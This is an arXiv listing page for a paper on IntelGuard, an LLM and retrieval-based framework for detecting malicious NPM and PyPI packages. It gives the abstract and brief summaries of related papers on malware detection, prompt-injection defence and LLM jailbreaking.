Related papers: Bridging Expert Reasoning and LLM Detection: A Knowledge-Driven Framework for Malicious Packages

Bridging Expert Reasoning and LLM Detection: A Knowledge-Driven Framework for Malicious Packages

URL: http://arxiv.org/abs/2601.16458v1
Date: Fri, 23 Jan 2026 05:31:12 GMT
Title: Bridging Expert Reasoning and LLM Detection: A Knowledge-Driven Framework for Malicious Packages
Authors: Wenbo Guo, Shiwen Song, Jiaxun Guo, Zhengzi Xu, Chengwei Liu, Haoran Ou, Mengmeng Ge, Yang Liu,
Abstract summary: Open-source ecosystems such as NPM and PyPI are increasingly targeted by supply chain attacks.<n>We present IntelGuard, a retrieval-augmented generation (RAG) based framework that integrates expert analytical reasoning into automated malicious package detection.
Score: 10.858565849895314
License: http://creativecommons.org/licenses/by/4.0/
Abstract: Open-source ecosystems such as NPM and PyPI are increasingly targeted by supply chain attacks, yet existing detection methods either depend on fragile handcrafted rules or data-driven features that fail to capture evolving attack semantics. We present IntelGuard, a retrieval-augmented generation (RAG) based framework that integrates expert analytical reasoning into automated malicious package detection. IntelGuard constructs a structured knowledge base from over 8,000 threat intelligence reports, linking malicious code snippets with behavioral descriptions and expert reasoning. When analyzing new packages, it retrieves semantically similar malicious examples and applies LLM-guided reasoning to assess whether code behaviors align with intended functionality. Experiments on 4,027 real-world packages show that IntelGuard achieves 99% accuracy and a 0.50% false positive rate, while maintaining 96.5% accuracy on obfuscated code. Deployed on PyPI.org, it discovered 54 previously unreported malicious packages, demonstrating interpretable and robust detection guided by expert knowledge.

Related papers

Mind the Gap: Evaluating LLMs for High-Level Malicious Package Detection vs. Fine-Grained Indicator Identification [1.1103813686369686]
Large Language Models (LLMs) have emerged as a promising tool for automated security tasks.<n>This paper presents a systematic evaluation of 13 LLMs for detecting malicious software packages.
arXiv Detail & Related papers (2026-02-18T09:36:46Z)
Cutting the Gordian Knot: Detecting Malicious PyPI Packages via a Knowledge-Mining Framework [14.0015860172317]
Python Package Index (PyPI) has become a target for malicious actors.<n>Current detection tools generate false positive rates of 15-30%, incorrectly flagging one-third of legitimate packages as malicious.<n>We propose PyGuard, a knowledge-driven framework that converts detection failures into useful behavioral knowledge.
arXiv Detail & Related papers (2026-01-23T05:49:09Z)
ReasAlign: Reasoning Enhanced Safety Alignment against Prompt Injection Attack [52.17935054046577]
We present ReasAlign, a model-level solution to improve safety alignment against indirect prompt injection attacks.<n>ReasAlign incorporates structured reasoning steps to analyze user queries, detect conflicting instructions, and preserve the continuity of the user's intended tasks.
arXiv Detail & Related papers (2026-01-15T08:23:38Z)
Unveiling Malicious Logic: Towards a Statement-Level Taxonomy and Dataset for Securing Python Packages [0.19029675742486804]
Existing datasets label packages as malicious or benign at the package level, but do not specify which statements implement malicious behavior.<n>We construct a statement-level dataset of 370 malicious Python packages with 2,962 labeled occurrences of malicious indicators.<n>We derive a fine-grained taxonomy of 47 malicious indicators across 7 types that capture how adversarial behavior is implemented in code.
arXiv Detail & Related papers (2025-12-14T05:28:30Z)
Taint-Based Code Slicing for LLMs-based Malicious NPM Package Detection [2.398400814870029]
This paper introduces a novel framework that leverages code slicing techniques for an LLM-based malicious package detection task.<n>We propose a specialized taintbased slicing technique for npm packages, augmented by a backtracking mechanism.<n>An evaluation on a dataset of more than 5000 malicious and benign npm packages demonstrates that our approach isolates security-relevant code, reducing input volume by over 99%.
arXiv Detail & Related papers (2025-12-13T12:56:03Z)
The Trojan Knowledge: Bypassing Commercial LLM Guardrails via Harmless Prompt Weaving and Adaptive Tree Search [58.8834056209347]
Large language models (LLMs) remain vulnerable to jailbreak attacks that bypass safety guardrails to elicit harmful outputs.<n>We introduce the Correlated Knowledge Attack Agent (CKA-Agent), a dynamic framework that reframes jailbreaking as an adaptive, tree-structured exploration of the target model's knowledge base.
arXiv Detail & Related papers (2025-12-01T07:05:23Z)
VulAgent: Hypothesis-Validation based Multi-Agent Vulnerability Detection [55.957275374847484]
VulAgent is a multi-agent vulnerability detection framework based on hypothesis validation.<n>It implements a semantics-sensitive, multi-view detection pipeline, each aligned to a specific analysis perspective.<n>On average, VulAgent improves overall accuracy by 6.6%, increases the correct identification rate of vulnerable--fixed code pairs by up to 450%, and reduces the false positive rate by about 36%.
arXiv Detail & Related papers (2025-09-15T02:25:38Z)
TraceRAG: A LLM-Based Framework for Explainable Android Malware Detection and Behavior Analysis [8.977634735108895]
We introduce TraceRAG, a retrieval-augmented generation (RAG) framework to deliver explainable malware detection and analysis.<n>First, TraceRAG generates summaries of method-level code snippets, which are indexed in a vector database.<n>At query time, behavior-focused questions retrieve the most semantically relevant snippets for deeper inspection.<n>Finally, based on the multi-turn analysis results, TraceRAG produces human-readable reports that present the identified malicious behaviors and their corresponding code implementations.
arXiv Detail & Related papers (2025-09-10T06:07:12Z)
BlindGuard: Safeguarding LLM-based Multi-Agent Systems under Unknown Attacks [58.959622170433725]
BlindGuard is an unsupervised defense method that learns without requiring any attack-specific labels or prior knowledge of malicious behaviors.<n>We show that BlindGuard effectively detects diverse attack types (i.e., prompt injection, memory poisoning, and tool attack) across multi-agent systems.
arXiv Detail & Related papers (2025-08-11T16:04:47Z)
Defending against Indirect Prompt Injection by Instruction Detection [109.30156975159561]
InstructDetector is a novel detection-based approach that leverages the behavioral states of LLMs to identify potential IPI attacks.<n>InstructDetector achieves a detection accuracy of 99.60% in the in-domain setting and 96.90% in the out-of-domain setting, and reduces the attack success rate to just 0.03% on the BIPIA benchmark.
arXiv Detail & Related papers (2025-05-08T13:04:45Z)
Detecting Malicious Source Code in PyPI Packages with LLMs: Does RAG Come in Handy? [6.7341750484636975]
Malicious software packages in open-source ecosystems, such as PyPI, pose growing security risks.<n>In this work, we empirically evaluate the effectiveness of Large Language Models (LLMs), Retrieval-Augmented Generation (RAG), and few-shot learning for detecting malicious source code.
arXiv Detail & Related papers (2025-04-18T16:11:59Z)
Towards Copyright Protection for Knowledge Bases of Retrieval-augmented Language Models via Reasoning [58.57194301645823]
Large language models (LLMs) are increasingly integrated into real-world personalized applications.<n>The valuable and often proprietary nature of the knowledge bases used in RAG introduces the risk of unauthorized usage by adversaries.<n>Existing methods that can be generalized as watermarking techniques to protect these knowledge bases typically involve poisoning or backdoor attacks.<n>We propose name for harmless' copyright protection of knowledge bases.
arXiv Detail & Related papers (2025-02-10T09:15:56Z)

This list is automatically generated from the titles and abstracts of the papers in this site.